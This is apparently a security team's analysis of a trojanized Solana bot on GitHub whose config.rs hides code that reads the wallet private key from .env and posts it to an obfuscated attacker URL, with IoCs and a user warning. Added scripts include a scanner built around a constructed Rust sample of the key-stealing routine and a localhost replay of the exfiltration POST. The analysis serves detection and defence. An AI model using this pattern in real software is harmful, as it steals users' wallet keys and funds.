Malicious Bots Resurface in Solana Ecosystem: Configuration Files Hide Private Key Leakage Traps
In early July 2025, a user contacted the security team and asked for an analysis of how their crypto assets had been stolen. The investigation showed that the theft was triggered by an open-source project hosted on GitHub that the user had downloaded and run: the project contained hidden code that exfiltrated the user's wallet key.
Since then, more users who had their assets stolen after running similar open-source projects have contacted the security team. In response, the team carried out a more in-depth analysis of this attack method.
Analysis Process
Static Analysis
Static analysis located suspicious code in the configuration file /src/common/config.rs, concentrated in the create_coingecko_proxy() method. This method first calls import_wallet(), which in turn calls import_env_var() to obtain the private key.
The import_env_var() method reads configuration values from environment variables loaded from the .env file. If the requested variable does not exist, execution enters an error-handling branch that continues to consume resources.
Sensitive values such as PRIVATE_KEY are stored in the .env file. After import_wallet() obtains the private key, it checks the key's length.
The malicious code then wraps the private key so that it can be shared across threads.
After obtaining the private key, create_coingecko_proxy() decodes an obfuscated URL. The decoded address is the attacker's server listed in the IoCs below.
The malicious code converts the private key into a Base58 string, builds a JSON request body, and sends it to that URL with a POST request, ignoring the response.
The same method also contains legitimate functionality, such as fetching prices, to cover the malicious behavior, and its name is deliberately misleading: it reads like a CoinGecko price proxy rather than a key-exfiltration routine.
create_coingecko_proxy() is called when the application starts, during the initialization phase of main() in main.rs.
According to the analysis, the IP address of the server is located in the United States.
The project was updated on GitHub on July 17, 2025. The main change was to the configuration file config.rs under the src directory, where the encoded attacker server address was replaced with a new encoding.
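The static analysis above describes a recognizable shape: one function reaches the wallet private key (directly or through a helper such as import_wallet()), decodes an obfuscated string, and makes an outbound HTTP request whose response is discarded. The following is an added example, not code from the report or from the malicious project, of a heuristic triage script that scans Rust source for that combination so an auditor knows which function to read first before running anything. The embedded Rust sample is constructed for this example; its function names mirror the report, but the bodies, the length threshold and the encoded URL are assumptions.

```python
"""Added example (not the report's code): heuristic static triage of Rust
source for a function that both reaches the wallet private key and performs
an outbound HTTP request. It is a reading-order aid, not proof of malice."""
import re
from typing import Dict, List

# Constructed sample standing in for src/common/config.rs. Function names
# follow the report; the bodies are assumptions written for this example.
SAMPLE_RUST = r'''
pub fn import_env_var(key: &str) -> String {
    match env::var(key) {
        Ok(v) => v,
        Err(e) => { println!("{}", e); loop {} }
    }
}

pub fn import_wallet() -> Result<Arc<Keypair>> {
    let priv_key = import_env_var("PRIVATE_KEY");
    if priv_key.len() < 85 { std::process::exit(1); }
    Ok(Arc::new(Keypair::from_base58_string(&priv_key)))
}

pub async fn create_coingecko_proxy() -> Result<f64> {
    let wallet = import_wallet()?;
    let url = String::from_utf8(base64::decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ=")?)?;
    let body = json!({ "private_key": wallet.to_base58_string() });
    let _ = reqwest::Client::new().post(&url).json(&body).send().await;
    let price = reqwest::get("https://api.coingecko.com/api/v3/simple/price").await?;
    Ok(0.0)
}
'''

FN_RE = re.compile(r"\bfn\s+([A-Za-z_][A-Za-z0-9_]*)\s*\(")
KEY_ACCESS = re.compile(r"private_key|import_wallet\(|Keypair::from", re.IGNORECASE)
NETWORK = re.compile(r"reqwest|\.post\(|\.send\(|TcpStream|hyper::")
OBFUSCATION = re.compile(r"base64::decode|hex::decode|from_utf8\(")
RESPONSE_IGNORED = re.compile(r"let\s+_\s*=.*\.send\(")


def split_functions(src: str) -> Dict[str, str]:
    """Map each `fn name(` to its body by brace matching from the signature.
    Good enough for hand-written source; not a real Rust parser."""
    bodies = {}
    for m in FN_RE.finditer(src):
        start = src.index("{", m.end())
        depth, i = 0, start
        while i < len(src):
            if src[i] == "{":
                depth += 1
            elif src[i] == "}":
                depth -= 1
                if depth == 0:
                    break
            i += 1
        bodies[m.group(1)] = src[start:i + 1]
    return bodies


def triage(src: str) -> List[dict]:
    """Flag functions that reach the private key (directly or via a callee that
    does) and also make a network request; decoded strings raise severity."""
    bodies = split_functions(src)
    reaches_key = {n for n, b in bodies.items() if KEY_ACCESS.search(b)}
    changed = True
    while changed:  # propagate key access up the call graph to a fixed point
        changed = False
        for name, body in bodies.items():
            if name in reaches_key:
                continue
            if any(re.search(rf"\b{re.escape(c)}\s*\(", body) for c in reaches_key):
                reaches_key.add(name)
                changed = True
    findings = []
    for name, body in bodies.items():
        if name in reaches_key and NETWORK.search(body):
            obf = bool(OBFUSCATION.search(body))
            findings.append({
                "function": name,
                "obfuscated_string": obf,
                "response_ignored": bool(RESPONSE_IGNORED.search(body)),
                "severity": "high" if obf else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_RUST):
        print(f)
```

On the constructed sample the only hit is create_coingecko_proxy, rated high because it also decodes a Base64 string; import_wallet reaches the key but makes no request, so it is not flagged on its own. A real audit would run this over every .rs file and then read the flagged functions and their callees by hand.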
Dynamic Analysis
To observe the theft process directly, the team wrote a Python script to generate a test Solana keypair and set up an HTTP server on a test machine to receive POST requests.
The attacker's encoded server address in the project was replaced with the encoded address of the test server, and the private key in the .env file was replaced with the test private key.
After the malicious code was launched, the test server received the JSON data sent by the malicious project, which contained the test private key.
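The following is an added example, not the report's own script, that reproduces this dynamic-analysis setup end to end on one machine: it plants a constructed 64-byte key in Solana's secret-key layout (32-byte seed followed by the public key), starts a throwaway HTTP server on an ephemeral localhost port, replays the exfiltration request described in the static analysis (private key as a Base58 string inside a JSON POST, response ignored), and decodes what the server captured to confirm it is the planted key. The JSON field name and the request path are assumptions; when the `cryptography` package is installed the public half is a real ed25519 key, otherwise it is random filler, which is sufficient because the bot only length-checks and encodes the key before sending it. Nothing here contacts the attacker's infrastructure.

```python
"""Added example (not the report's code): a local trap that reproduces the
dynamic-analysis step. Plant a constructed test key, run a throwaway HTTP
server, replay the bot's exfiltration POST, and check what arrived."""
import json
import os
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, urlopen

B58_ALPHABET = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58encode(data: bytes) -> str:
    """Base58 with the Bitcoin/Solana alphabet; leading zero bytes become '1'."""
    n = int.from_bytes(data, "big")
    out = bytearray()
    while n:
        n, rem = divmod(n, 58)
        out.append(B58_ALPHABET[rem])
    pad = len(data) - len(data.lstrip(b"\x00"))
    return (B58_ALPHABET[0:1] * pad + out[::-1]).decode()


def b58decode(s: str) -> bytes:
    n = 0
    for ch in s.encode():
        n = n * 58 + B58_ALPHABET.index(ch)
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + raw


def make_test_key() -> bytes:
    """64-byte test key in Solana's secret-key layout (seed || public key).
    Uses ed25519 via `cryptography` when available; otherwise the public half
    is random filler (assumption: the trap only needs the right length)."""
    seed = os.urandom(32)
    try:
        from cryptography.hazmat.primitives import serialization
        from cryptography.hazmat.primitives.asymmetric import ed25519
        priv = ed25519.Ed25519PrivateKey.from_private_bytes(seed)
        pub = priv.public_key().public_bytes(
            serialization.Encoding.Raw, serialization.PublicFormat.Raw)
    except ImportError:
        pub = os.urandom(32)
    return seed + pub


RECEIVED = []  # requests captured by the trap server


class TrapHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        RECEIVED.append({"path": self.path, "body": self.rfile.read(length)})
        self.send_response(200)
        self.end_headers()

    def log_message(self, *_):  # keep the server quiet
        pass


def simulate_exfil(url: str, secret_key: bytes) -> None:
    """Replay the bot's behaviour: Base58-encode the key, wrap it in JSON,
    POST it, ignore the response. Field name "private_key" is an assumption."""
    payload = json.dumps({"private_key": b58encode(secret_key)}).encode()
    req = Request(url, data=payload, headers={"Content-Type": "application/json"})
    with urlopen(req, timeout=5):
        pass


def run_trap() -> dict:
    """Start the trap on an ephemeral localhost port, replay the exfiltration,
    then return the planted key and the key recovered from the capture."""
    RECEIVED.clear()
    server = HTTPServer(("127.0.0.1", 0), TrapHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    planted = make_test_key()
    try:
        simulate_exfil(f"http://127.0.0.1:{server.server_port}/", planted)
    finally:
        server.shutdown()
        server.server_close()
    hit = RECEIVED[0]
    leaked = json.loads(hit["body"])["private_key"]
    return {"planted": planted, "leaked": b58decode(leaked), "path": hit["path"]}


if __name__ == "__main__":
    result = run_trap()
    print("leaked key matches planted key:", result["leaked"] == result["planted"])
```

In the real investigation the POST is made by the Rust project itself rather than by simulate_exfil(); the server side is the same. Pointing the project at such a trap (by swapping the encoded URL for an encoded localhost URL, as the report describes) shows the leak without ever giving the attacker a key, and the decoded body can be diffed against the planted .env value to confirm exactly what was sent.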
Indicators of Compromise (IoCs)
IP address: 103.35.189.28
Domain: storebackend-qpq3.onrender.com
Malicious repository:
Other repositories with a similar implementation:
Summary
In this attack, the attacker disguised malicious code as a legitimate open-source project to lure users into downloading and running it. The project reads sensitive values from the local .env file and transmits the stolen private key to a server controlled by the attacker. Attacks of this kind are usually combined with social engineering, and users who are not careful can easily fall victim.
Developers are advised to treat unfamiliar GitHub projects with great caution, especially any that handle wallets or private keys. If a project must be run or debugged, do so in an isolated environment that contains no sensitive data, and never execute programs or commands from unknown sources on a machine that holds real keys.